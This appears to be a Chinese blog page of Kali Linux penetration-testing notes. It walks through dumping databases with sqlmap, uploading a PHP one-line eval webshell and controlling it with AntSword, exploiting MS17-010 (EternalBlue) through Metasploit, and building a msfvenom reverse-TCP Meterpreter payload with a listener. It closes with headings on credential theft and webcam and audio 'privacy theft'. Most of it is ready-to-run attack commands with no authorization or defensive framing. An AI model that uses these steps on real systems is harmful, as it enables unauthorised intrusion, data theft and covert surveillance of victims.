当前位置: 首页 > news >正文

Kali Linux 渗透测试基础操作与漏洞利用笔记

一、环境准备与系统配置

1.1 环境

  • 虚拟机平台:VMware

  • 操作系统:Kali Linux(网络安全人员专用系统)

1.2 换源(更换为国内镜像源,提升下载速度)

sudo apt update
  • 编辑源列表文件:

    sudo nano /etc/apt/sources.list

    将文件内容替换为国内镜像源(如阿里云、清华源等),例如:

    deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

    保存并退出。

1.3 更新软件包

sudo apt update && sudo apt upgrade -y

1.4 设置中文语言环境

sudo dpkg-reconfigure locales
  • 在界面中勾选zh_CN.UTF-8(空格选中,Tab键切换到OK)

  • zh_CN.UTF-8设置为默认语言

1.5 重启生效

sudo reboot

二、SQL注入漏洞利用(sqlmap)

2.1 概述

  • sqlmap:自动化SQL注入检测与利用工具,支持多种数据库(MySQL、Oracle等)。

2.2 基本命令流程

步骤命令说明
1sqlmap -u <目标URL>检测目标URL是否存在SQL注入漏洞
2sqlmap -u <目标URL> --dbs获取所有数据库名称
3sqlmap -u <目标URL> -D <数据库名> --tables获取指定数据库中的所有表名
4sqlmap -u <目标URL> -D <数据库名> -T <表名> --dump获取指定表中的所有数据(字段与记录)

示例

sqlmap -u "http://example.com/page?id=1" --dbs sqlmap -u "http://example.com/page?id=1" -D users_db --tables sqlmap -u "http://example.com/page?id=1" -D users_db -T admin --dump

三、任意文件上传漏洞利用

3.1 漏洞原理

  • 网站未对上传文件进行严格验证,攻击者可上传恶意脚本(如WebShell)。

3.2 常用工具

  • WebShell木马:如一句话木马(PHP/ASP/JSP等)

  • 中国蚁剑:一款开源的跨平台WebShell管理工具,用于连接并控制目标服务器。

3.3 基本利用步骤

  1. 制作木马(例如PHP一句话木马):

    <?php @eval($_POST['pass']); ?>
  2. 上传木马:通过文件上传功能将木马上传到目标服务器。

  3. 连接木马:使用中国蚁剑,添加Shell地址(如http://target.com/uploads/shell.php)和连接密码(如pass)。

  4. 提权:获取Shell后,通过系统漏洞或配置错误提升权限(如从普通用户提至root/Administrator)。


四、永恒之蓝漏洞利用实例(MS17-010)

4.1 背景

  • 漏洞编号:MS17-010

  • 影响:2017年WannaCry勒索软件利用该漏洞在全球爆发。

  • 靶机:Windows 7/2008等未打补丁的系统。

4.2 使用Metasploit(msf)进行渗透

  1. 启动msf控制台

    msfconsole
  2. 搜索相关漏洞模块

    search ms17-010

    常用模块:exploit/windows/smb/ms17_010_eternalblue

  3. 使用模块

    use exploit/windows/smb/ms17_010_eternalblue
  4. 查看配置选项

    options
  5. 设置必要参数

    • 设置目标主机IP(rhosts):

      set rhosts 192.168.xxx.xxx
    • 设置本地监听IP(lhost,通常为攻击机IP):

      set lhost 192.168.yyy.yyy
    • (可选)设置payload,如windows/x64/meterpreter/reverse_tcp

  6. 执行攻击

    run
  7. 获取Shell后的简单操作

    • 若获得Meterpreter会话,可进入系统Shell:

      shell
    • 在Windows目标上弹出消息框:

      msg * "你好"
    • 打开计算器(测试命令执行):

      calc

上传病毒upload,运行病毒execute -f

五、部署木马

5.1 使用 msfvenom 生成木马

  • Powershell 类型木马示例(反向 TCP):

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.yyy.yyy LPORT=4444 -f psh-reflection -o shell.ps1

5.2 接收木马、监听连接(Metasploit Handler)

msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp options set lhost 192.168.yyy.yyy(黑客IP) set lport 4444(端口) run

目标执行木马后,handler 会建立 Meterpreter 会话。

5.3 MSF 工具功能总结

一、MSF控制命令大全

二、权限提权与凭证获取(渗透核心)

三、文件系统操作(文件管理核心)

四、网络操作(内网渗透关键)

五、系统操作(控制目标主机)

六、用户界面监控(监控、控制目标桌面)

七、摄像头、音频(隐私窃取)

http://www.cnnetsun.cn/news/1349454.html

相关文章:

  • Windows上使用scp安装OpenSSH服务端 客户端
  • 小学子讲技术 - OpenClaw 配置与安全详解
  • 备考自习室座位预约系统签到 签退_Python django flask
  • MMU 、 IOMMU、 SMMU
  • Python爬虫实战:构建全网最全 Emoji 符号元数据字典!
  • 什么是HTTP?什么是HTTPS?
  • PPO 训练一个机械臂
  • 习题3.12 另类循环队列
  • SpringBoot3接口优化:一行注解搞定字典与关联字段翻译,告别冗余循环
  • 计院操作系统实验10
  • 从0实现OnCall基于Python语言框架
  • MTK Android12预装APK避坑指南:解决Android.mk配置与三方应用签名冲突
  • 打卡信奥刷题(2967)用C++实现信奥题 P5959 [POI 2018] Plan metra
  • 论文人救星!Paperxie:从初稿到终稿,一站式搞定写作 / 绘图 / 排版 / AI 率
  • V-DyKnow A Dynamic Benchmark for Time-Sensitive Knowledge in Vision Language Models
  • Qt导航栏组件A03:VS Code 风格的图标侧栏
  • 【Rust 语言编程知识与应用:表达式详解】
  • 增程式电动汽车自适应ECMS能量管理策略:基于工况的Matlab实现方案
  • C#全自动多线程上位机源码编程 0,纯源代码。 1,替代传统plc搭载的触摸屏。 2,工控屏幕...
  • comsol数值模拟。 金属合金凝固数值模拟,连铸过程数值模拟,相场流场温度场,坯壳厚度计算
  • 基于改进蛇优化算法(GOSO/ISO)优化极限梯度提升树的时间序列预测
  • 在现代工业自动化中,恒压供水系统是一个常见的应用场景,特别是在高楼大厦、工厂和住宅小区中。今天,我们来聊聊如何用三菱PLC和组态王实现三泵变频恒压供水系统
  • 从统一入口到角色化体验:全面理解 SAP Fiori Launchpad 与 SAP Fiori Apps 的实施逻辑
  • 工业检测实战:同轴光源LFV3系列在金属刻印字符识别中的5个关键技巧
  • Hunyuan MT1.5-1.8B API限流设计:生产环境稳定性保障
  • 华为NAT类型选型指南:为什么你的企业网络应该用NAPT而不是静态NAT?
  • dac/cap/lsm
  • Rust impl关键字实战:从封装到多态的全面解析
  • 别再滥用dynamic了!C#动态类型避坑指南与性能优化技巧
  • 从零到一:基于MaxKB与Ollama构建企业级私有化智能知识库